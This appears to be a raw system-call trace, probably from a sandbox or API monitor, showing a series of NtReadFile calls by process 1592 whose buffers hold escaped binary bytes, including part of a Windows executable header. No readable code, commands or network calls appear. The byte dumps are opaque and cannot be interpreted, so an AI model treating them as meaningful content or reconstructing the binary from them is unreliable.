J\x07\x88\x8bE\x08\x8b=\x84\xd8\x8d~v\xe1\x7f@\x83\xc0\x04QP\x89\xb9\xff\xd7\xee\x89]\x089\x85\xf3\xe5\xd6\x02\\xd8\xfeu\x0eh\x18@\xdf\xa6{\x9f\x80\x0cP\x0e\x98|8\x9d!\x0f/\xd6\xcd\xdc\x84\xa9\x9f-&xV\x0cv\xd2\xf0\xfeI\x80<\x08\t\x0e\x19<\x90\x8d\xa3\xa6{v\xd8P+\xd6\x08j 6t(\xd8w\x0b\xdf\x80Ij\x02Sj\x034\x02\x7f\xd39\xd3\x1cp;\xc3t2\x83\xf8\xff|\x92\x1dv\xbaclph\x0cG:&4\x14\x10\x11d\xeb\x10\xdf\xee\xccd%`>u\x0f\xff\xfb\x83}\x08\x02\xb8\xc3\x9a\xe1\x0f\x8c\x19k\xcf u\xfd>\x9a\x91b,\x1f<5\x90W\xd6-<:w FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => R\xfb\xfdBY]\xfc;\xc1u
3u\xd8c\x92l\xdf\xe9-\x06@\xeb\xf6+\x14\x04x]\x83\xe6n\xb0M\x00U\x0cC\x93\xb7\xb6}{c\x84\xc9\x08:\x02\x18AB\xeb\xedP\x01\x02/\xff\xe2\xf1
+\xc17'VW\x8b}\xf6\x89u/\xd0q\xe1\xf8\x80?I\x84H+S\xd6>&\x0f\xcc\xd2\xdd\xdc\x851
\x16\xfcF
##\xeey\xe2\x97\xf3F\x0f\xbe\x04>\xca\x11Y\\xdf\xda\xffo\x0e\x88D\x1d\xdcCF\x83\xfb\x0fr\xe2\x80d
%\xc98M\xdc\xf87\x13\xb7\x89\x7ft\x16\xc6/\x10@\x8d\x0c\x89\x808\xbcs\x05\xde\x1fLJ\xd0\x83\x17O;u\x01F\x19'~7\xde\x8e\xce\x00Tj\x14\xef\x99\xb7\x13M\xb8\xf8\xa2=\xba\x96 ]\x8e\x16\x8b\xdb\xdd\x88\x19\xeb\x16\x10%pD\xb9\xb5\xa5\x08\x90P
\x7f\xb8\x10\xee\x16\\xb7\xff\xdc\xb0\x8bB0\xfc +\xf3Pa\x07\xcf\xda\xae\xf4\xc4;\xf0\xedtQ+\xfe\xd9\xbf\xb5\x03\xf3\xee\x1c> FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => k\x81\xfe\xb9\xe1_\xc5\x03U\xf6v+\xfc\x11\x85\xd2tJ\xc8O\x17@ ~\x0b\x8a\x136\xf8\xd2\xff\x88\x0c>F@Ju\xf5\xc6\xc3.F\xeb'\x94\xfc\x8e\xcd\xb1`\xc6\x02\xa5f\x01\xd7\xaf\xfd\x9d\\x85g\xa5%\xff?\x0bT\xf6\x8d\xc6\xbb\x12\x04|\xa6\xeb\x0biv|7\xff.\xa8\x99\xfeJ\xffN\x85\xf6\x7f\xf4\x80$\xf7@^t\x03\xf7\xfa\xc4\xad\xa9\x92\xa7\x1a\xe70P[\xcc\x10\xcex{F\xae\xc8\xf6\xb1u\xe8^\x1b(\x05Z\xe9\xaf\xa0j\x0cX
\xcb#p\xdbxk<\x02\xf4}\x079\xe9\x16+u\xbf\xd8\x85\xa1ESr\x8b\xdeP)&\x85\xc1n\xf0\x8b\xd8Y;\x17Y|\x1fs\x00\xd4m[\xdbF
\x03N\xd6\xc15\xf8\x08\x06n\xb3\x80\xeb(\xf4T\xe0\xeb\x03:\x8b\x0eXp/\xb5\xd2\xc9\x14\x01\xddx\x01\x19\xd8\\x10\xbd\xdc\xee\xa2|\xcd\x12a`\x7f \x8dC
\x1a\x14L\xd7\xde5\x9c\x02I\xdeRa\x12\xa1C\xe9\xe9C\x12\xd8 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => :\xe4\xc2\x92V\x8ew\xb6\x9d\xae\xe6\x80\x11
\xe8\x93\x15\xa3\xdc\xd6xdL\x11(\x8b@}I\x00\x1b\xd6\xd0\x05\x07\xa3q\x15\xb5\x8dB\x03\x18\xf8\x81\x19-\xfbY\xfd\xd3\x04k\xc0X\x06\xf5\x9b\xfb\x95\xe5d\xe1:\xf9\x83z\xfftb\xd1\xfdv1.1-\x05\xe9 \xef\x8e\x0c\x0b\xa1\x04\xf9\xc3\x8b\xab\xa9mF\x17\xb6\xf8WH\x80\x03\x80\xea\xd0\xae\x85.@2<\xae\xba3Hm\x87tSg\x10^$\x01w\x90\xc1\x0f\x0c3\x8a\x0e\xd6\xf4m\x1c`\x15\xe2\x9dY\x13\x1fl[\xa3c{u\xc5\xbb,\xc0\x1c\x0c\xdb\xe2\x99\xcd0\x08\x1d\x17F27\\xe2\x96\x05u\xe3\xd9\x89\\xd9<<@\xb1\x92\xcb\xdet?(T\x14\xde\x7f\x15\xacwx\x97\x88\x04+CY<\x19\x16\xba\xc1J\xbdo@\x987\x8cTk\x89\xedzO\xf9\x04+\x017 \xdd\x83\x1f\xd8\xebP\xc4+@\x0f\xc2\xce\x16\xb2\x98\x15*\x85\x0b\xdd\x8e\xe4+\x06^+@\xdcK%\xdc\xb6\xd5y FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,205 | 1592 | NtReadFile |
Buffer => \x8d\x8d\xb5\xa5`\xe0\xbe2\xcb\xd5(\xe2\xc1\xa2nG\xec\x8c\xb3\x82\x18b\xf0\x93\x86V
\x1e\xdc-\x8bv\x06\x0b\x87Phn\x1c6\xd7\x86\x83Z\xc8\xe2\xc4\xc7\x0f\xa7\x0ej\xc3\xe2-\xd8\xd9D=\xeb?W\x16\xddb\x18\xf0\x80f\x05\x00\x95\x1c\x01\x8a\xaf\x99\xb0K\xcf\x88\x06d\x84\xa1|\xb9\x88\xb5h\x1d$\x85\xd1e\xe8P\x93\xc8\x04yP\xa1\xb3$
x\xfe
P\x1f5\x0b\xb5<g,\x14c\xfe;7{\x13\xf2)\xfc\xfcl0\x12\xfef\xcf\xd9<-\xfc
\x1e\x17=\xfcY'\xdb\x16\x86I4\xff\xd7\xe4\xe0\xfe\xbaX8\xf2\x08\x16\x17\xce7\x04YH\x06\x8d\x8c<Zb\xd6\xb6\xad\xeb\x88\xb0\x84\xa9\xcdn\xf1\xeaey\x98\xf9!\x06F>\xcc\xa6\x1a\xaa\xf8,\x84\x8c2\xcc\x06\xc4.\x95\x1c\x14\xf7\xf6*>\xf5\xee\xbb\x8fbt'A;\xca|\xf4\x0bh\x83\xc0
`\xa4\xf8h-\x0c\x0c\xe7\xf4&d\xa8\x7f5R@j\x7fP\x10V\x80Pg\xce FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => G2]`k+[\x01\xf2\x8b_\x04\x97\xa2\xd19Otu\xaf\x99\x0f\x8eT\xfav\x88tv|M\x0cP\x80~,\xd4hc\xe4\xb4H\xec\xfaL3\x18l_a^\xfd[\xcc\x08p\x9b\xd9\x88\xd3}8\xd6\xc4]j\xfb\x0b\x8d\x8d_\x01O\xf8\x8d\x1e\xff-\xbcu]5\xb3\x15\x85P\xcf~\x13\x04D\x96\x1c\x17*\xaf\x94\x10\x17\xd9\xccI]\xa8\x117\x9f\x7f\xed\xb9\x12}#\xbe\x11\xcf\xbe\x19\x140\x80\xba\x18\x16@Y|\xed\xeb\x0e\xb7\x1a5\xe9\x141b\xb7\xc8|r+\xfc\xff\xee\x8dQ\x03;\xd0}e;\xcf}a;\xc1WO\\x06\xbf\xb56\xd8\xbb!H\x12O\xd8\xf8;\xc2~C\xb5\xe2M\xfc;\xc7~?+\xc1\x0c\xff\x07|6Km\xb1\xd1/\x16\x03\xce;\xd7}\xac\x01\x8f\x15\xd1\x10|S\x11BA\x81\xfa\xfeR\xe9\x1eH\xf5Z\xf7\x1076;[\xe6\xc2\x97\xcb\x8b\xfb;}\x0c\x8c1\x89\x8b6u\x12mB_h\x14\x11h\x10\x14X\x08 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => p\xea\\x9eeWN\xd8\\xb0\x8b\xef;\xfe\xa9>\x12s\xc0\x0c\xe5\xdcNY95\xe5)\xb8\x83\x96\x8b\x1d\x84\x86\xe4\xa3\xdf\xb3\x85Wp\xd3 \x8d\xbd\x05PO\xd5\x05\xb3\x16?\x80<8\\xf9\x19<;\x10g\x0e\x15]\x11x\x18\xc9r\x8c\x93h@k\xa4\xfdV}\xb6\x95*\xfb\x92\xfc\x15Pu#\x00\x91\xa7\xe05\xd90\xe0X1\xbbzu\x03#O\xeb\x11\x1f\xce\x8a\x8f\x98$k\xac\xd7\xbd\xd0\xe7f\xdbp<;\x1b\x08\xd1\x00t\xae\xcc0\xb2|\x11 \xd2\x9c\x0fZ\xbeQ6\xd9\xc5P\xbeTP\xb7\x88}\xc9+\x13\xf6\xa5\xcc j
\xbb\xc0\x84K(\x89\x0cH"A\xd8QvVB\xa9JCH'X\xe1\x17\xb1\xb5\xd4P-Yy\x19\xf8\xf8\xa0\xb1\xbc\x1cN[u\xca\x03N\x19F\x9b\xb4\x18\xaf
\xa6i\x9a^g\xe5Loc\x82\xa6i\x9aal Se\x96eY\x96\xf0tting,[AYs\x92Te,\x9b\xe5\xb6mF\xd3 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x01\xe2\x01\xeck\xe4\xd8\x88\xd1\x9b\x15\x92\xa8\x04!\x88<gt?*\xc6^\xa7,8\xc5:3M\x01@\xaf\x9ae\x88P\xbcGE\x89K\xc5\x12c\xd8\xf1\xbb\x08\x9dl\x05]\x80\xc7;\xdd\xc5\xff\x93\xc9\xa2\x1f\x08\x07w?\xff$\x95\xd9[\xe7\xef\x86M\xfa\xe8&D6h\xd8\x06/h\xc8\xe7\xe7\xe7\xe7(h\xb8!h\xa4\x1ah\x94\x13hp\x15\xb3\xe6\xe7\x0chX\x05hHWy\x97E\xbcc\x10hD\x11\x90\x03v\xa9K<\xea.\x11J6h<=\x8c}vr, +hh\x18\x07\x8dV\xf1\xac\x10\x90\x06\x81\xc3\xa6;\x98t/YS\x1c\xdbK\xd0(\x99\xe2\x05\x01a\x8e\x14o\x15\xa4]\x18\x01~$\xdd\xb7\x82\x91Z\xde;\xcat\x08$A\xa2M\xd65\xf4\x03Y\x94\x05@7\xd9\x7f\x84'\x03\x85\xd2\x89U\xfc~\x1a\x19\x1a\x17\x0f\x7f\x03\xfe\x80\xc2a\x88\x147\xad\xfc|\xe6\xc6\x84\x1eG@\xb3I\x14\xdc\xbe\x90\xa4U\xb4\x9f \xdf
\x93V FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => 8!\xd8\xc0\x94\x08\xfcP\x07;\xd0K\x84G\xe2\x82\x10\x0f\x85\xc2\x84\x19\x8f \xd7\x84/C8\xacWb2T\xa6\x0cG`\x98Q\xfe\\x91\xde\x11l\xca\x02 sPH~$\xe3A\x182\xf0\xfd\xc6f\x07^^\x13\x96&S\xa0\xc9h\xcb\x97\xf3<h\x90X\xd2\x9d\xccPh\x11GA\x1ac\xfe\xafW\xea\xd7
4F3O\xdaS\xba\xa2\x018+\xaa\xc7\x048\x88\xbe;\xba\xa63\x94\x9e\xb0\x06\xea }\xe8I\xc7'\x89\x03\xec\x81;\xaf}\x0ejC\x85\xb3\xdf\xaav\x1e\xeb\x0eP\xb0\xc3\x16\x8c\x13\x11\x07\x82\xd6\x00n\xe2%l\x80&\x00\x1eT\xb7\xff\x02\xf0f\x7f`\xde\xe8Dt9HHt-\x08\x0et\x81\xb0@\xb4\x1c\x04\xd0\xb4\x1f\xea\x02\x9f\xc1
\xcf0\xeb%'\x04Q!\xf4\xe9\x93/\xc3\x81\xc1\xa0\xeb\xef0\xad\xf9\xfdm&1\x88\x16\x80f\x01\x1f\x08\x02\xcfd\x9d\xeb\xe5\xedit\x1d\x04tt\x10wu^\xdc1"8\x02\xb7\x82\xc7\xd7 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \xf7\x80\x8e"\x9aYO\xed\xfcm\xba(\xe5x\x8b\xb8\xdbh\xf0)5U\xb3\x03\x92\xb1Y\xd3\xa2\xb7\xbd\xcd$W\x05\xf2\xb8\x98\x1dA\xb3\xef\xbdj\x1aTW
\xc9F\xaf\xfbAU\x14\x80\x8c"R\_pAL\xb9R\xdc_|\x05\xb9Qc\xd1\xb9\x84#V\x054Q\xe6&\xebvFh\xf8\xabWV\x18P
\x05\x1c\xe0a\xb4i3 H\xc8\xf7R\x15+\xe4\xf3\x0et\x83\x11\xf8\xc0\xc3SHE\xb9\xe1\xa2}\x9f\x1a\x01\xaf\x01~\x08E\x07\x0f\x8c
\xc2h$w\xc0\x8a\x1b\xd3@\xf8\x8f\x89\x9d\x0f\xff\xf1\xd4\xb2\xb1\xcaF\x9aF}\x06\x89\xb5Z 9x\x1b\xde \xfbs\xa1
n\xf8}D\xf8\x89\xbdD\xfaB\xec;s\xc0\x1f^Y\x0cA\x0b\x83|\x92\xdd
K\xf5M\xc3\x8d\xb5O\xf4\xa8\xc4\xb7\xab\xdd^us\x8b\xb1\xbf\x01?E\xb8\xf7\xe0\x02-m\x05\x9f#a#h\xad\x07\x0c\x13\x0c@w\xbb\xc1I\xf5\x15P\x0f\xf4"\x88\x18N?\xfcf' FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x93\xf0\x8f1>\xbb\xd5\x1a`\xcd\xb7\x81\x0ed6TS4n\xadNs\x07\xbf\x8d6\xfa\x00\x92\xe7;D11L<\xb2\xcf\x9c=\xd5\x00,\xcd%4 \xb1\x91\xeeY\xe1\xb5\x00\x86\x8f\xaa"\x0b\x06\x1e[^=4\x8cj\x8b\xaae\xe3\xe3\xd0\xeb
\xd6\x1b\x9a
B\xc9ho\x99\xfb\xe7\xf8u\xec\x08\xecGQ\xe8\xdd\x06B\x11\xeb\xee;\xc2\x01\x00\x83\x07,D\x11\x0f\x01\x8f\xd3\x9b\xa1r\x90\xcf\x05\x13+\x06~\xd1\x89\xc8\x10g~F\x02I\xdeuE\xde\xa0*\x05h,*\xdf\x11\x0e\xd8\xfcj\x99|\x1fw}\x18\xda$`k\xd6>\x88\x13\x0e\x1e\xf7Y\xe0\x8c\xe8\x84\xaf\xfc\xaa\xc6\x948\x87QB\x91$\xfe\xd3\x85\x87O\xe9\xb8\xe4vP\x83\xd8*#\xdfgC\xc0\xdc\xae\xb0*h\xa8R\xa0-L\x9ac\x17\\xff\x985$\x17\xd0\x82\x06\xe9\x9f\xd6\x01\xb1\x80\xb33W\xd9\x1e\x07cH\xc9Ja\xf0\xf7A\x8c\xd8\x87\x07\x10\x10^\xd68\xf8\xb6\xc8D\xdfW FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \xb8s\x11=
\x0fK\x00,\xb8\xe0Z\x84z\xda\xfc\xb7\x9c#<Y!\x05s\x07h\x80\xeb\xdc]\x13\xde\xac\8\xaePs\x0bX\x84\xbb\x0b9ht,% \x1agW\xf2y<s&$'25p\x89\x91\xfc&%\xdc%ip\xdc\x007\x1bTs\x06`5{\xf6\xd8u\x04g\xdehh;, \xd0\x19\x9b\xcc\x91\x1e.\xd76|P\x81\xfa\xc2
\x7fR&'\xe3\x9c\xf0\x84})\x0c\x83Ar*\x0b2>\xc9\xd9\x93\x1er\x17\x12\x14
\x0f\x83\xa8\x1a\xbaf(?\xc6G\xe9C\x1c\x1eB\xde\xdcY\x8a\x028h\xd8+<r\x13\xb7\xddvJseB\xd00\xebA?\x07\x03{x%7Hh\x98\xf7\xf76\x048c;\xbbl\xebAY?%\x94X\xf2R\x9c\xc0l\x903\x18\x034\x04\x02v\xa9\xdchHGWKP\x03%"\x0c;\x03\x18\x95\xbbE\xc0\xbe$%X\x110\xa4j\x19\xd5\x05\x03\xf9\xfd0+8+8\xcd%\x1c}\x80\xfc\xfe FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \xa2\xe8\xb9\xe2\xae\xbd\x98C\xc6\xcb
k\xcc\x03\xff\xff\xc3\xffx\xbb\xbe\xc0\xb70\xc6c \xdcN,My\xa4\xbc\x05\xab\xff\xe5\xe8\x8e\x9f
!
\xff\x9f\xff\xff\xfa\xb71\xfd\xfe\xff\x87?\xdai\xbbf\xe0\xab\xc4q\xae\x95D\\xc9Ex\x91\x95\x98\xa4\x8f\xfc\xff\xff\xd8\x9a\xa7\xb9=\xe3^$\x17\xed\x85\x05ch\xb5\xd6\xbek\x02\xe6b\xd5x\xe1\xd2\xf3\xff\xff\xff\xbd\x82\x18\x1a$\xd3\x8dM\xce<\xb5\xae\xbe\x90\x1c\xc5\xc4\x0e?\xe9.\xa1\xa7m\xbfU\x02@\xff\xff\xff\xff\xe2\xe0PI\x0f\xc3?\x12\xb6t\xb3{\xfc\xfa\x93\x96k\xd0\x92\xc7\xaaFMPWDHOUEJ\xff\xff\xff\xffQ\x8fu\x9c\xbeVGKNTA@CBBEC@DP/\xc4\x9aDDGF6n@$5\xff\xff\xff\xff\x1f\x9a\xb7\xb7\xa0\x08/5,5\x06C\x02./I"O%\xbe\xac\xfe\xa0\x125 \x0c\x14\xcc-e\xcd\xff\xbf\xfd\xff\xc0\xad}Dv\x12\x17\x16+ FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => +\x18CzF=\xd8G\x7f\xb9.\xf5\xb6\xfd\xff\xff\xff\x81=W,&\x8e\xb9\xc8E\xd8\x02\xc2\xbaQ,\xe5\x1c\x1a\xf4*\xad\xd1\xb5A\x93\xa8~\x99\x8e<\xff\xbf\xfd/3\x10\xc2\xc1BN\xcc\xc2O\xe9f\x00\xf6\x9c,\xba<*\xca\x06{\x0c\x0f}\xdfX\xf8\xff\x89+z9\xe9\x11rrn\xd6\xd0\x81\x0c\x18\x01\xccB\xb6\x8aU\xff\xff\xff\xff7x\x16\xd5_Mxq?QQ.\xac.\x9a\xc1vM\xa8\xb6pz\x97<FW\xcf}\xd9\x02\xf2\xf4\xff\xff\xbf\xf0\xb3>\xed<\x86\x9f=\xcf\xbeG\xdb2\xf6\x96<Ew2r\xb7\x18*\x14i[+\xff\xdf\xfe\xffI\xffTW]w\xb7\x95\xb2\x02\xb5\xccUq-!V\<N\xcaP\xc2\x80E\xc8\x15\xc4\xff\xad\xff\xff\x99|\xac\xabs4~-@\x95ZRL\x18H+'oY\xa8\xdfI\xc9v\x02]\xe8\xff\xff\xff\xc2\x87Fz\xb2=g\xe0l\xf9\xf51\x9a\xb9`\x85m\x82\xb0.'\xf78S| FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => ?v\xfa?d\x18K\xd2]T\xeaV\xae\xbb>
<@\x07\x04\xbf\xd1\xff\xffz\xaf=\x9a\x02\xedF)\x85Hl\x1c\x9f\x9d\x1e_\xc3|\xb70P\x81\x95@\xff\x85\xff\xffM|~
\x86\xce>Q)\xd1\x1e@\xa2}/\xbd)\xda\xc4\x9c!\xabn\xaf\xc2x\xff\xd6\xff\xffm5K\xdb\xcd]\x93\xeeG+\xaf\x18I\x8dEM\x89I@tE\xbd&\xd1\xa7\xd6\xfa\xff\xff[\xb7?`\xbaT\x10s>\xdbQ\xbd\xc1\xe5D\xbc/\x07_\xdbl\x04\x01y\xed\xdf\xf8\xb7\xae\x97\x96p\xd1\x80L)n\xc9\x93\xc2/7W"\xce\xff\xff/\xf4\xce)S]7I\xf4Iqc\xba\xd8\xc5\xecq\xf7iTQ\xc0\x83\xb1cS\xff\xff\xff\xff\,\xf7\x13\x17\x04\xde\x95\x17s\x84\xa9\xd9(\xc2\x90\x01@\x18\xaff|\xfb\x1c\x81\xbf\x15\x9e\x12\x87\x04\x85\xff\xff\xff\xffB\x1co\xd6\x8a\x84.\x87'\x865\x896\x88 \x8a\xa43\xf8V\x8b3\x8a$\x8d\x1d\x8c\x0c\x8f,\x96m FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \xd1\x06z\xb8$g\xff\x17\xfa[\xf8\x1f\x8eIB\x07\x82\xec\xd1\x15`7:1\xc8\xe24D\xff\xff\xff\xff\x95y\x07Ib\x8b\xd4\x9b\xa9j\x89
\x82\xeek\xee\xf6S\x06\xf3\xc8\x1f\xf4\x0e\xaax\xfe\xe6\x06\x87N\xb7\xff\xff\xff\xffz\x8e?G
\x9e\x80\xa2B\x12\x9a\x91\xd9*\xbe\x03\x8e\xc8\x17E5\xf3\xca\x8a\x01t\x012\xa0\x81\xf4\x18\xdf\xda\xea\xff\x83&\xe4\x89*\x95\x84,Pa?<\xca\x0c\xc0Z\xfb\x15\xff\xff\xff\xffzJ\x015z\x83=\x08\xd9\x11\xd19\x89\xbe\x1f\xe8\xf9S\x9c6\xda\x11U\x18\x84z\xca\x86\xb6\x91\x87r\xff\xff7\xf8\xe6\xff\xec\xb5x\xc7<gSvQf=\xca^,y\xe2pG(}\x80&\xfc[|\xab*\x0cO\x17\x8bG\xefR\x18F\xf2\xd8\x17\x14\xff\xff\xff/\x94\x06\xb6z\x16\xe7sF \x16\x08z\x805Pr\xe2\xf4,JJ\x8b\x02\x836x-\xbc\x89\xff\xbf\xf1\x17\x1f+\x83\x1fE\xcc\xf3\xea\xea\xbeO\x1e\x0ba
FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => %'\xcd&\x85\xd1\x16\xe17(\xf0\xbf\xbf\xed\xd1\xbc\xfcQ\xcd\x17\xe9\x83\xc6\xad\xcb@\xbf\xf0\xff\xff\xc5\x9d\x9f\x11\x8b\x00\xa9\x84\xc9@3\xabD2Zy)\x86/KFZj\x8b\xc9\x14\xff\xb7\xff\xff\xe2\x14KY\x0e\xcc\x8f"\xafq\x87\x13\x81X\xd0e\x1f\xbc\x04\xcd1M\xe6\x0b'-\xae\x88_\xe0\xff\xff\x9fWR\x0e4\x8bOB\xa9$\xdd;\x07\xf0\x18)\x94\xcc\x11\x14cJ\xf1\xf4\xfe/\xf4\xffA\x13\xec\xf4cM\xf9\x848\xf2\xabv\xdbr\x81yB5`\x01\xc1}B\xbf\xfd\xff\xb7C\xb8WB\x82\xcb \xbe1\xe8\xde;\xedM\xf7F\x87\x8a!@\xa3\xe8W_\xe0\xdb\xff\x1cM\xa9\xd0\x0b\x12\x13"\xf7\x14\x8eD\xe2\xbda8\xac\x80\xbd\xae\xdf\xe8/\xf4\x80U?\x0bY\xb9
\xf4\xbeS\xc3{D\xa9}\xaf/\xf5\xff[\xffs=K\xbe\x9c\xfez\xa3\x80q\xaa[\xcb_[R\xc1\xff\xbf\xd4\xff\xa0\xe9\x1e\xb7\x98\xd8Z\x88Z6K\xb6\xbe\xb8aX FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x11 \xf6\x1d\x9e{\xdf\xe2\x17\xf8D#\x19\xaaN
_\x10\xbeyf\xe9\x91\xb6\x99Z7\xfa[\xff\x81B\x1f\x18\xf9 \xeeJO\xb5|\xc7\xd1+}\x9b\xc6.\xfa\xff\xff\xff\x92\x96\xcc@\QP\x11nE\x11u\xb6\xcf\xaf,Y\x92\x1fEN\xc4\xe3\xeajq\x1a\xba\x0f\xff\x17\xfe79z`S\xce\xac\xc6<Q\xdf\xa4W\x11mW48\xcaQ\x16\xc1\xf4\xb7\xf8\xed\xd6\x1ck\xc3t\x11\x04N\xd1X\x9e!$'\xdf\xa7\xff_\xe2o,'a\xa7K6\x19\x19\x1b\xc0[\xe2\xed\x11Z@Y\xfd\x87\xed[\xfc\xff\xffP\x89\x14Le\x9f8\xf1\T7r\x16\xf9+i\xcb<(\x1a\xbf\x1b\x83_\xf8\x05\x16\xfa\x8dy\x89[zcC+\xa9\x1b\x80\x06\xa7\xff\xff\xff\x97Uah_\x90)\x8c\xe5P\xb4\x19{\x90\x83\x0e\xff#\xd4Qb\x1f\xab\x1b\xc4I2\x90\xfd_\xfa\xff\x96@\x90\xab\x8d,2\xf5\x11`\xab\x04\xbdv\xba\xae\x9c\xafN\xfe\x8eaEP\xff\xad FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \xb3\xe5\x18eCQ\xff/\xfd\x06\xc7A'\x80\x8f\x8f\xcdZErF\x19v\x1a\xb7\x11M{\xa5\xfe\xff\xffiQF\x11\xcfdZGB-n\x18Va\xedWA%\xfd_\xf1NJ\x1d\xbcp\xab\xff\xc59\x04'c\xd1\xbf7 \xaaEbz!o%\xfd\xff/-\x03 \xf6\xa5*M
\x01W\x81A\xc1 \xbaE\xcdqB\x8f\xcc\x89\x03yF\x14a\xbe!\xa8c\xff\xb7m\x11m\xcc\x05\x81\xbe\xbe\x16\xc2\x8c\xbe\xaaQ\xd1\x00\xcb{\xe3\xff\x8dG2F\x06@\x9a4F\xca_\xc2\xaf\xbdO3\xac\xf9A+\xdd\x0e\xd8\x11P\x81\x0c2\xae*\x0e\xa5.\xc1\x072\xa5p\x88s3L\xe1\x1d\xd8\xb7\xbaI=\xc2\x8e55\xc8\x84/\x88\xc2B\xf6\x84\x0c4a\x00\x1cL\x0b\xfc\xb7\x7f\xc2\x80C\xc0\xbcA\xb2\x95\xc2\x90@\xccUn\xc2\xbc\xf9NJ\xf1F\xee\xcbC\x03\x94\xa4\xb6\xa8"\x8b\xfe\xd2\xff
\xf4C\xc2\x83E\xc8F\xc2\x86E\xc2\x086\xb0@\x8e\xa8
FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x0f\x8b\xcc\xdc\xa5\x84\x11)um0\x0cO\xb3\xcd&\xb7?d\xc2\xf8m\xa0\xa2an\x87se0\x8a7\x17k\x8cr\x10\xf6\x07isd\xbd\xf6\ z\x19\xf2\xce\x10\x14\xa2x\xae[P\x08"97\xa1+3*a*!\x02J\x0ff\xb3T\xcd \x01\xa1U\\x0f\x16\xb0\xdfNBuffA\x0f\x0bLow\xf6\x19\xb6#wvIr\x94#w
\x85\x9bqZ\xf4\xcc\x0cM\x82\xc2\x00\xa8mY\xb6M\xd7\xb7\xd8b@\xff\x04\x02\x13\x0beY\x96e4\x17\x12\x10\x03\xabeY\x96\x0f \x14s9\xbf\xff\x84\xbc<PEL\x01\x03\xe0\x00\x0f\x01\x0b\x01\x07\xae{\xd2l\x13r*\x802\x04\x10\x03\x82lg\xb1\x905\x0b\x023\x04\x99[\xd2\xcd\x07\x0c\xd0\x1e4{\xd9\x1b\xd8\x10\x07\x06\x00\xc0y\x08@\x80[dx\x02\x18\x05F\xb8\xc2v+dx\x01\x1e./\xd8\x93\xa0\x98\xa4p\x90\xeb6\x7f\xbb\xb0\x04# \x0b`.data\x98#\xeeB\xba FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
Buffer => \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x00\x00 \x00\x00\x80\x0e\x00\x00\x00\x90\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x00\x00\x00@\x00\x00\x80\x02\x00\x00\x00h\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00X\x00\x00\x00\xd8\xf0\x00\x00\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\x80\x00\x00\x00\xc4\xf3\x00\x00(\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\xd0\x00\x00\x80\xa8\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00 \x04\x00\x00\xc0\x00\x00\x00\xf0\xf4\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x000 FileHandle => 0x000001e0 |
SUCCESS | 0x00000000 | |
| 07:45:03,215 | 1592 | NtReadFile |
